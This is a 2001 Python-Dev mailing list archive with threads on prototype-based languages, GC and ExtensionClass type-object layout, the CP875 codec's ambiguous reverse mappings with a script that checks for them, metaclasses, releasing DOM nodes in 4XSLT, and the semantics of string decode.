Obliq (this didn't stick in my mind from when I read the papers
back in the "safe Python" development days, but it's listed in
my book), as well as XlispStat's object system (which isn't 
listed in that book, but there is an ObjectLisp -- I don't know
if they were at all related) -- and Tim said JavaScript. 
The Amulet and Garnet GUI systems are prototype-based -- Garnet
written in Lisp and Amulet in C++. 

 For NewtonScript, Kevo, and maybe JavaScript, I suspect the
simplicity of the system was a motivation. 
 
("the book" I'm reading is "Prototype-Based Programming -- Concepts,
Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan
Moore, pub. Springer. A collection of papers, some of which are 
available on the Web -- I know the Self papers, one description of
NewtonScript, and one or two articles on Kevo are online, as well
as Cardelli's Obliq paper. )


-- "Steve" Majewski


From martin at loewis.home.cs.tu-berlin.de  Sat May 12 21:16:58 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 21:16:58 +0200
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>

> Has anyone investigated interactions between ExtensionClass objects
> and GC?

At some point, extension classes used a literal copy of
PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
and only had the spare fields that were expected then. Today,
PyTypeObject has much more fields, so extension objects produce random
errors (eg. with GC) when used in a modern interpreter (where the copy
has not been synchronized). Whatever immediately follows the type
object in memory may be interpreted as GC flag.

Regards,
Martin


From guido at digicool.com  Sat May 12 23:08:05 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:08:05 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200."
             <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> 
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> 
Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com>

> At some point, extension classes used a literal copy of
> PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
> and only had the spare fields that were expected then. Today,
> PyTypeObject has much more fields, so extension objects produce random
> errors (eg. with GC) when used in a modern interpreter (where the copy
> has not been synchronized). Whatever immediately follows the type
> object in memory may be interpreted as GC flag.

Not quite true.  ExtensionClasses (at least recent versions that
worked with 1.5.2) contain a copy of the type object up to and
including the tp_flags field, and the 2.1 code is careful not to use
any newer fields without first checking the corresponding flag bit.

Now, if you are using the 1.4 version of ExtensionClasses you might
not have the tp_flags field either (I don't know, I can't easily
check) but the 1.5.2-compatible version of ExtensionClasses doesn't
even require recompilation to work with Python 2.1.
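The guard described above (never touch a newer slot unless a flag bit says the structure is new enough to have it) can be modeled in Python. This is only an analogy: `HAVE_NEW_SLOTS` and its bit value are hypothetical, not CPython's actual `Py_TPFLAGS_*` constants, the "type objects" are plain dicts, and `get_new_slot` is a hypothetical helper.

```python
# Hypothetical feature bit; CPython's real flag values live in object.h.
HAVE_NEW_SLOTS = 1 << 14


def get_new_slot(type_record, slot_name):
    """Return a newer slot only if the flags say the type was built with it."""
    if not type_record.get("tp_flags", 0) & HAVE_NEW_SLOTS:
        # Older layout: whatever follows tp_flags is not ours to read.
        return None
    return type_record.get(slot_name)


old_style = {"tp_name": "OldExtensionClass", "tp_flags": 0,
             "tp_traverse": "garbage that merely follows the struct"}
new_style = {"tp_name": "NewType", "tp_flags": HAVE_NEW_SLOTS,
             "tp_traverse": "real traverse function"}

print(get_new_slot(old_style, "tp_traverse"))  # None
print(get_new_slot(new_style, "tp_traverse"))  # real traverse function
```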

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Sat May 12 22:12:39 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 22:12:39 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>

> But I don't know whether the ambiguity in cp875 is a bug or an
> undocumented feature

The official (as in "as official as it gets") mapping between CP 875
and Unicode is at

http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT

This is also the file which served as an input to generate cp875.py.

Character 1A, which is the mapping result of these characters, is
indeed known by the name "SUBSTITUTE", apparently following the
definition in

http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm

# substitute character (SUB): A control character that is used in the
# place of a character that is recognized to be invalid or in error or
# that cannot be represented on a given device.

That would suggest that these characters in EBCDIC 875 do not have
equivalents in Unicode. However,

http://www.kostis.net/charsets/ebc875.htm

suggests that the characters in question (3F, DC, E1, EC, ED, FC, and
FD) have no character meaning at all.

It seems that IBM's ICU library also maps U+001A to character 3F, see

http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup

It appears, from looking at

http://www.natural-innovations.com/boo/asciiebcdic.html

that byte 3F *is* the substitution character in EBCDIC. So it is a bug
in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC
character which is mapped to SUBSTITUTE; I think cp875 should be
corrected to always map U+001A to 3F. That is not something the
generator can currently do, though.

So I think we can take one of two approaches:

1. admit that CP 875 is not round-trippable, and exclude it from the
   test (although when looking at the first 128 characters only, it
   is round-trippable).
2. remove the SUBSTITUTE mappings from CP875, acknowledging that
   apparently these characters have no meaning in that code page.
   Unfortunately, I could not find any official IBM documentation
   page that lists the characters supported in each of the EBCDIC
   code pages.
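Option 2 can be sketched as follows, under the assumption (not stated above) that byte 0x3f keeps its SUBSTITUTE mapping because it is the EBCDIC SUB character, while the other six bytes become undefined (None, which Python's charmap codec treats as undefined). The reverse mapping is then one-to-one, so dict ordering no longer matters. `decoding_map` is only an excerpt, and `drop_duplicate_substitutes` is a hypothetical helper.

```python
SUBSTITUTE = 0x001a
EBCDIC_SUB = 0x3f

# Excerpt of the generated decoding map: EBCDIC byte -> Unicode ordinal.
decoding_map = {0x40: 0x0020, 0x3f: SUBSTITUTE, 0xdc: SUBSTITUTE,
                0xe1: SUBSTITUTE, 0xec: SUBSTITUTE, 0xed: SUBSTITUTE,
                0xfc: SUBSTITUTE, 0xfd: SUBSTITUTE}


def drop_duplicate_substitutes(decoding_map):
    """Keep U+001A only for the real SUB byte; mark the rest undefined."""
    cleaned = dict(decoding_map)
    for byte, ordinal in decoding_map.items():
        if ordinal == SUBSTITUTE and byte != EBCDIC_SUB:
            cleaned[byte] = None  # undefined byte
    return cleaned


cleaned = drop_duplicate_substitutes(decoding_map)
# Every defined value now appears once, so inversion is unambiguous.
encoding_map = {v: k for k, v in cleaned.items() if v is not None}
print(hex(encoding_map[SUBSTITUTE]))  # prints 0x3f
```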

The second seems to be more correct to me, although it is a deviation
from the Unicode consortium publications.

Regards,
Martin


From guido at digicool.com  Sat May 12 23:21:21 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:21:21 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400."
             <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
References: <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>

> Also: There are two basic implementation models:
> 
> Delegation  [a.k.a. "Lifetime sharing", cloning]
>   sort of like Python -- if you don't know how to handle it "ask" 
>   a parent object. ( "ask" in quotes, because I've recently been
>   in a long argument about whether Objective-C & Smalltalk can
>   really be said to "send messages", or if it's "just" dynamic
>   lookup and function application! ) 
> 
> Extension  [a.k.a. "Birth sharing", copying, concatenation ]
>   more like how I imagine C++ vtables are built -- the Python 
>   equivalent would be like merging all of the class __dict__'s
>   together with name-clash priority going to the nearest
>   relative. 
> 
> ( "Life Sharing" vs. "Birth Sharing" -- is a change in the
>   base class after object creation inherited by the object? )

Interesting.  So is the rest of this thread, but since Python is not a
prototype language and is unlikely to become one, I'd like to mention
that Python 2.2 will likely allow you to choose either paradigm, on a
per-class basis, using metaclasses.

I'm finding metaclasses in Python useful for different things than
they are in Smalltalk, and I expect that they will continue to play a
less important role.  But they are important because they control many
"policy" aspects of Python classes/types: e.g. whether instances have
a __dict__ or a specific set of slots (maybe even typed slots),
whether changes can be made to a class after it's been created, the
semantics of multiple inheritance, and so on.
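Today's Python 3, which postdates this message, can express two of those policies directly. The sketch below uses a hypothetical `FrozenClassMeta` metaclass that rejects changes to a class after it has been created. It also uses `__slots__` to give instances a fixed set of slots and no `__dict__`.

```python
class FrozenClassMeta(type):
    """Metaclass policy: a class may not be changed once it has been created."""

    def __setattr__(cls, name, value):
        raise TypeError(f"cannot set {name!r} on frozen class {cls.__name__}")

    def __delattr__(cls, name):
        raise TypeError(f"cannot delete {name!r} from frozen class {cls.__name__}")


class Point(metaclass=FrozenClassMeta):
    # Instance-layout policy: a fixed set of slots and no per-instance __dict__.
    __slots__ = ("x", "y")

    def __init__(self, x, y):
        self.x = x   # instance attributes still work; only the class is frozen
        self.y = y


p = Point(1, 2)
try:
    Point.z = 0      # rejected by the metaclass
except TypeError as exc:
    print(exc)
```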

Right now, my metaclasses continue to be implemented in C, although I
expect that eventually they will be subclassable in Python.  Watch the
descr-branch in the CVS tree.  I hope I'll soon have some time to write
a PEP, too.

It's an interesting journey!  The book I am reading about this:
"Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
http://cseng.awl.com/book/0,3828,0201433052,00.html

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g at Virginia.EDU  Sat May 12 22:53:26 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 16:53:26 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105121640050.261-100000@localhost>


On Sat, 12 May 2001, Guido van Rossum wrote:

> Interesting.  So is the rest of this thread, but since Python is not a
> prototype language and is unlikely to become one, I'd like to mention
> that Python 2.2 will likely allow you to choose either paradigm, on a
> per-class basis, using metaclasses.

 As I said earlier: the only advantage would be if it could simplify 
things "under the hood" (compared to metaclasses) but could still 
provide the same Class semantics (with maybe a "proto" declaration
sneaking its nose in under the tent.) 
 But I have no immediate idea on how to do that, and it sounds like
you're pretty far along into an implementation already. 

> I'm finding metaclasses in Python useful for different things than
> they are in Smalltalk, and I expect that they will continue to play a
> less important role.  But they are important because they control many
> "policy" aspects of Python classes/types: e.g. whether instances have
> a __dict__ or a specific set of slots (maybe even typed slots),
> whether changes can be made to a class after it's been created, the
> semantics of multiple inheritance, and so on.

 I guess my practical question, which I meant to ask before I got
myself sidetracked into preaching prototypes is: How much of the
existing plumbing (specifically the Don Beaudry hack) can I rely
on in the future for the objective-C/python bridge ? 
 With BOOST and Zope's extension classes relying on it, can I 
assume that it's being extended rather than replaced ? 
( I guess I ought to take a look at the code! ) 

> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

Thanks for the reference. 
Talking about interesting journeys: 

 Guido: did you ever imagine back at that first workshop at NIST
that you and Python would be where you are today ? 


-- Steve Majewski 


From gmcm at hypernet.com  Sat May 12 23:09:41 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Sat, 12 May 2001 17:09:41 -0400
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
References: Your message of "Sat, 12 May 2001 11:07:06 -0400."             <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost>

[Guido]
> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

The two things that struck me most when I read that last year:
 
 - How eminently ill-suited C++ is for this stuff (the book 
develops a framework in C++)

 - a very convincing argument that if you derive C from A and B 
(whose metaclasses are not the same), the system must 
derive a metaclass for C, using MI from A and B's 
metaclasses.
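Modern Python 3 does not derive that metaclass automatically. It raises a "metaclass conflict" TypeError and leaves the derivation to you. Here is a small sketch with hypothetical `MetaA` and `MetaB`:

```python
class MetaA(type):
    pass


class MetaB(type):
    pass


class A(metaclass=MetaA):
    pass


class B(metaclass=MetaB):
    pass


def try_naive_derivation():
    """Return the error message Python gives for C(A, B), or None if it works."""
    try:
        class C(A, B):
            pass
    except TypeError as exc:
        return str(exc)
    return None


class MetaC(MetaA, MetaB):
    """The derived metaclass, built by MI from the bases' metaclasses."""


class C(A, B, metaclass=MetaC):
    pass


print(try_naive_derivation())
print(type(C).__mro__)
```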

duct-tape-skull-cap-advised-ly y'rs

- Gordon


From tim.one at home.com  Sat May 12 23:22:49 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 12 May 2001 17:22:49 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMNKBAA.tim.one@home.com>

[/F]
> reverse sorting makes sense to me.  but the cp-files appear to be
> machine generated, so patching that python file won't help.

Agreed.

> a truly future-proof solution would be to specify exactly how to
> resolve every many-to-one mapping, for every font having that
> problem.  but sorting them is clearly better than relying on
> implementation-dependent behaviour...
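Below is a Python 3 sketch of one reading of "reverse sorting", offered under that assumption. It builds the inverse map by visiting keys in descending order. For a many-to-one mapping, the smallest byte is therefore written last and wins, whatever the dict ordering. The sample entries are the cp875 SUBSTITUTE mappings listed in this thread, plus the EBCDIC space (0x40 -> U+0020) for contrast. `invert_deterministically` is a hypothetical helper, not the codec generator's actual logic.

```python
def invert_deterministically(decoding_map):
    """Build an encoding map whose many-to-one choices do not depend on dict order."""
    encoding_map = {}
    # Visit keys from largest to smallest: when several bytes decode to the
    # same code point, the smallest byte is stored last and therefore wins.
    for byte, code_point in sorted(decoding_map.items(), reverse=True):
        encoding_map[code_point] = byte
    return encoding_map


# cp875's SUBSTITUTE entries as quoted in this thread, plus the EBCDIC space.
sample = {0x3f: 0x1a, 0xdc: 0x1a, 0xe1: 0x1a, 0xec: 0x1a,
          0xed: 0x1a, 0xfc: 0x1a, 0xfd: 0x1a, 0x40: 0x20}

encoding_map = invert_deterministically(sample)
print(hex(encoding_map[0x1a]))   # 0x3f
```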

The attached program suggests the problem is rare; of those encoding files
that have a Python decoding_map dict, only these triggered a meaningful
ambiguity complaint:

*** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
*** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875
is the only one that *can* fail (the ambiguities in cp1006 are for points >
0x7f, so aren't tested here).

Hmm!  Now I see that in a part of test_unicode that wasn't reached, cp875 and
cp1006 are excluded, with this comment:

    ### These fail the round-trip:
    #'cp1006', 'cp875', 'iso8859_8',

So the practical hack for now is to exclude cp875 from the earlier range(128)
roundtrip test too.

> (is Jython using exactly the same hashing and dictionary algorithms as
> CPython?  or does it work by accident also under Jython?)

Sorry, no idea.  Attempting to browse the Jython source on SourceForge caused
this cute behavior:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

    Python Exception Occurred

    Traceback (innermost last):
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
        main()
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
        view_directory(request)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
        fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
        raise 'error during rlog: '+hex(status)
    error during rlog: 0x100

let's-rewrite-it-in-php<wink>-ly y'rs  - tim

ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    # Integers print in hex; anything else prints via repr().
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)

# Every codec module (skipping __init__.py and other names starting with "_").
encfiles = [name for name in os.listdir(ENCODING_DIR)
                 if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    # Invert the map, remembering *every* key that decodes to each value.
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    # A value reached from several keys has no unique reverse mapping.
    ambiguous = [(v, ks) for v, ks in vtok.items()
                         if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."


From tim.one at home.com  Sat May 12 23:48:38 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 12 May 2001 17:48:38 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOENCKBAA.tim.one@home.com>

[Martin v. Loewis, whose encyclopedic knowledge of encoding details
 still isn't enough to get a clear answer (it's like somebody asking
 me for a simple answer to a floating point question <wink>]

> ...
> So I think we can take one of two approaches:
>
> 1. admit that CP 875 is not round-trippable, and exclude it from the
>    test (although when looking at the first 128 characters only, it
>    is round-trippable).

As I noted later, 875 is already excluded from the roundtrip test across
range(128, 256).  What it's failing is the roundtrip test across range(128):
after unicode("?", "cp875") produces u'\x1a', the following .encode('cp875')
has no way to know which range the original input came from.  So it's not
really round-trippable across range(128) either unless more info is given to
.encode().

> 2. remove the SUBSTITUTE mappings from CP875, acknowledging that
>    apparently these characters have no meaning in that code page.
>    Unfortunately, I could not find any official IBM documentation
>    page that lists the characters supported in each of the EBCDIC
>    code pages.
>
> The second seems to be more correct to me, although it is a deviation
> from the Unicode consortium publications.

Until you and MAL agree on the best thing to do (I have no opinion:  my only
exposure to Unicode in daily programming life remains the Python test suite),
I'm going to opt for #1:  as cp875.py stands today, it's simply a fact that
it's not round-trippable across any range including 0x3f.


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 00:32:10 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 00:32:10 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message
	from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>

> Now, if you are using the 1.4 version of ExtensionClasses you might
> not have the tp_flags field either (I don't know, I can't easily
> check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> even require recompilation to work with Python 2.1.

I'll attach a copy below of the struct as defined in
pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension
classes). As you can see, it does not provide tp_flags, but has a
field of tp_xxx4 for it.

That *should* work, except that it also has its 'methods' field where
tp_traverse would go, and its class_flags field where tp_clear would
go.

Now, you write

> ExtensionClasses (at least recent versions that worked with 1.5.2)
> contain a copy of the type object up to and including the tp_flags
> field, and the 2.1 code is careful not to use any newer fields
> without first checking the corresponding flag bit.

In this generality, it is apparently not true: Modules/gcmodule.c has,
in delete_garbage,

			if ((clear = op->ob_type->tp_clear) != NULL) {
...
		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
		(void) traverse(PyObject_FROM_GC(gc),
			       (visitproc)visit_decref,
			       NULL);

which does not check any flags. That still shouldn't cause any
problems, since the Gtk objects should never end up in the GC lists -
but maybe I'm missing something.

Regards,
Martin

typedef struct {
	PyObject_VAR_HEAD
	char *tp_name; /* For printing */
	int tp_basicsize, tp_itemsize; /* For allocation */
	
	/* Methods to implement standard operations */
	
	destructor tp_dealloc;
	printfunc tp_print;
	getattrfunc tp_getattr;
	setattrfunc tp_setattr;
	cmpfunc tp_compare;
	reprfunc tp_repr;
	
	/* Method suites for standard classes */
	
	PyNumberMethods *tp_as_number;
	PySequenceMethods *tp_as_sequence;
	PyMappingMethods *tp_as_mapping;

	/* More standard operations (at end for binary compatibility) */

	hashfunc tp_hash;
	ternaryfunc tp_call;
	reprfunc tp_str;
	getattrofunc tp_getattro;
	setattrofunc tp_setattro;
	/* Space for future expansion */
	long tp_xxx3;
	long tp_xxx4;

	char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
	/* these must be last */
	int tp_alloc;
	int tp_free;
	int tp_maxalloc;
	struct _typeobject *tp_next;
#endif
  PyMethodChain methods;
  long class_flags;
  PyObject *class_dictionary;
  PyObject *bases;
  PyObject *reserved;
} PyExtensionClass;
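The ctypes sketch below makes the overlap concrete by modelling only the struct tails that start at tp_doc. It rests on three assumptions. First, the preceding fields line up, as described above. Second, COUNT_ALLOCS is off. Third, PyMethodChain is simplified to a single pointer. Treat it as an illustration, not the real layouts.

```python
import ctypes


# Heavily abbreviated, hypothetical models of the two struct tails that
# start at tp_doc; the fields before tp_doc are assumed to line up.
class TypeObjectTail21(ctypes.Structure):
    """What Python 2.1's GC code expects to find after tp_doc."""
    _fields_ = [
        ("tp_doc", ctypes.c_char_p),
        ("tp_traverse", ctypes.c_void_p),
        ("tp_clear", ctypes.c_void_p),
    ]


class ExtensionClassTail(ctypes.Structure):
    """What the ExtensionClass struct above actually stores after tp_doc."""
    _fields_ = [
        ("tp_doc", ctypes.c_char_p),
        ("methods", ctypes.c_void_p),     # PyMethodChain, simplified to one pointer
        ("class_flags", ctypes.c_long),
    ]


for new_name, old_name in [("tp_traverse", "methods"), ("tp_clear", "class_flags")]:
    new_off = getattr(TypeObjectTail21, new_name).offset
    old_off = getattr(ExtensionClassTail, old_name).offset
    print(f"{new_name} at offset {new_off} overlays {old_name} at offset {old_off}")
```

Any code that reads tp_traverse or tp_clear from such a type without checking a flag bit would therefore pick up `methods` or `class_flags` instead.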


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 14:08:02 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 14:08:02 +0200
Subject: [Python-Dev] ReleaseNode interface in 4XSLT
Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>

Currently, 4XSLT has a dependency on the DOM implementation in terms
of memory management (among other dependencies). I'd like to reduce
this dependency, by providing a centralized function that knows how to
release nodes.

In PyXML, I currently use

# Define ReleaseNode in a DOM-independent way
import xml.dom.ext
import xml.dom.minidom
def _releasenode(n):
    if isinstance(n, xml.dom.minidom.Node):
        n.unlink()
    else:
        xml.dom.ext.ReleaseNode(n)

try:
    from Ft.Lib import pDomlette
    def ReleaseNode(n):
        if isinstance(n, pDomlette.Node):
            pDomlette.ReleaseNode(n)
        else:
            _releasenode(n)
    _XsltElementBase = pDomlette.Element
except ImportError:
    ReleaseNode = _releasenode
    from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and
supports installations without 4Suite (i.e. without pDomlette). I've
put this into xslt/__init__.py, so that all callers of
Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
If desired, I could produce a patch against the public Ft CVS.

As a slightly independent question, such a function also ought to
support DOM implementations not known to it; I'm thinking in
particular of the Zope DOMs. I'd like to hear proposals on how such an
interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite;
   you'd need to navigate from the node to the implementation, then
   you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown
   DOMs, effectively believing in reference counting, garbage collection,
   acquisition, and other black art.

Any comments appreciated, in particular
1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for
   Python DOM.

Regards,
Martin


From mwh at python.net  Sun May 13 14:36:26 2001
From: mwh at python.net (Michael Hudson)
Date: 13 May 2001 13:36:26 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com>
Message-ID: <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> Fredrik Lundh wrote:
> > can you take that again?  shouldn't michael's example be
> > equivalent to:
> > 
> >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > 
> > if not, I'd argue that your "decode" design is broken, instead
> > of just buggy...
> 
> Well, it is sort of broken, I agree. The reason is that 
> PyString_Encode() and PyString_Decode() guarantee the returned
> object to be a string object. To be able to reuse Unicode codecs
> I added code which converts Unicode back to a string in case the
> codec returns a Unicode object (which the .decode() method does).
> This is what's failing.

It strikes me that if someone executes

aString.decode("latin-1")

they're going to expect a unicode string.  AIUI, what's currently
happening is that the string is converted from a latin-1 8-bit string
to the 16-bit unicode string I expected and then there is an attempt
to convert it back to an 8-bit string using the default encoding.  So
if I'd done a 

sys.setdefaultencoding("latin-1")

in my sitecustomize.py, then aString.decode("latin-1") would just be
aString again?  This doesn't seem optimal.
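Here is a Python 3 model of the path described here. The function name is hypothetical, and `default_encoding` stands in for the value set by `sys.setdefaultencoding()`. The codec produces Unicode, and the extra coercion then turns it back into an 8-bit string.

```python
def string_decode_2_1(data, encoding, default_encoding="ascii"):
    """Model: decode with the codec, then coerce back to an 8-bit string."""
    text = data.decode(encoding)           # the Unicode object the caller wanted
    return text.encode(default_encoding)   # the extra step that loses it again


a_string = b"caf\xe9"                      # latin-1 bytes
# With a latin-1 default encoding, "decoding" hands back the input unchanged.
print(string_decode_2_1(a_string, "latin-1", "latin-1") == a_string)   # True
try:
    string_decode_2_1(a_string, "latin-1")  # ASCII default encoding
except UnicodeEncodeError as exc:
    print("fails:", exc.reason)
```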

> Perhaps I should simply remove the restriction and have both APIs
> return the codec's return object as-is ?! (I would be in favour of
> this, but I'm not sure whether this is already in use by someone...)

Are all the codecs distributed with Python 2.1 unicode-related?  If
that's the case, PyString_Decode isn't terribly useful is it?  It
seems unlikely that it received much use.  Could be wrong of course.

OTOH, maybe I'm trying to wedge too much behaviour onto a particular
operation.  Do we want

open(file).read().decode("jpeg") -> some kind of PIL object

to be possible?

Cheers,
M.

-- 
  GET   *BONK*
  BACK  *BONK*
  IN    *BONK*
  THERE *BONK*             -- Naich using the troll hammer in cam.misc


From mal at lemburg.com  Sun May 13 18:53:55 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 18:53:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFEBC22.1F0AF685@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > Fredrik Lundh wrote:
> > > can you take that again?  shouldn't michael's example be
> > > equivalent to:
> > >
> > >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > >
> > > if not, I'd argue that your "decode" design is broken, instead
> > > of just buggy...
> >
> > Well, it is sort of broken, I agree. The reason is that
> > PyString_Encode() and PyString_Decode() guarantee the returned
> > object to be a string object. To be able to reuse Unicode codecs
> > I added code which converts Unicode back to a string in case the
> > codec returns a Unicode object (which the .decode() method does).
> > This is what's failing.
> 
> It strikes me that if someone executes
> 
> aString.decode("latin-1")
> 
> they're going to expect a unicode string.  AIUI, what's currently
> happening is that the string is converted from a latin-1 8-bit string
> to the 16-bit unicode string I expected and then there is an attempt
> to convert it back to an 8-bit string using the default encoding.  So
> if I'd done a
> 
> sys.setdefaultencoding("latin-1")
> 
> in my sitecustomize.py, then aString.decode("latin-1") would just be
> aString again?  This doesn't seem optimal.

True and that's why I am proposing to loosen the restriction 
on having the two APIs returning strings only.
 
> > Perhaps I should simply remove the restriction and have both APIs
> > return the codec's return object as-is ?! (I would be in favour of
> > this, but I'm not sure whether this is already in use by someone...)
> 
> Are all the codecs distributed with Python 2.1 unicode-related?  If
> that's the case, PyString_Decode isn't terribly useful is it?  It
> seems unlikely that it received much use.  Could be wrong of course.

All standard codecs in 2.0 and 2.1 are Unicode related. I am
planning to write up a bunch of string-to-string codecs next
week though which will then be the first non-Unicode related
codecs in 2.2.

> OTOH, maybe I'm trying to wedge too much behaviour onto a particular
> operation.  Do we want
> 
> open(file).read().decode("jpeg") -> some kind of PIL object
> 
> to be possible?

This would be possible indeed. Even though some may find this
coding style obscure, I think this technique has the same
usefulness as e.g. piping at OS level.

I am thinking of these use cases:

"???".decode("latin-1") -> Unicode (object construction)
"...jpeg data...".decode("jpeg") -> JpegImage object (ditto)
"???".decode("latin-1").encode("cp1521") -> string (recoding data)
